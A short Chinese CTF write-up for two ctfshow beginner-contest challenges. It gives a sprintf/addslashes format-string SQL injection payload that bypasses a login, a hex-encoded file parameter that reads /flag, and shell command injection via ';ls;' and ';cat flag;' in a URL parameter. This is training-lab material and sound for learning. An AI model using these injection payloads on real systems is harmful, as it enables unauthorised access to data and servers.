ctfshow 萌xin赛

萌新赛 给她

git源码泄露.得到源码为

<?php
$pass=sprintf("and pass='%s'",addslashes($_GET['pass']));
$sql=sprintf("select * from user where name='%s' $pass",addslashes($_GET['name']));
?>


查看别人题解,里写了有关sprintf函数与addslashes的作用与漏洞。从WordPress SQLi谈PHP格式化字符串问题(2017.11.01更新)

 因此构造payload:?name=admin&pass=%1$' or 1=1--+

 后查看源码得到:flag in /flag

 所以肯定存在文件包含或上传。

burp抓包得知有file参数值经decoder模块ascll hex decode 后为flag.txt。

更改file参数的值,得知函数为 file_get_content().

/flag ascll hex encode为2f666c6167 更改file为之,得到flag。

 签到题

传入?url=;ls; 看见了flag。

 再传入?url=;cat flag;  得到flag。

  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值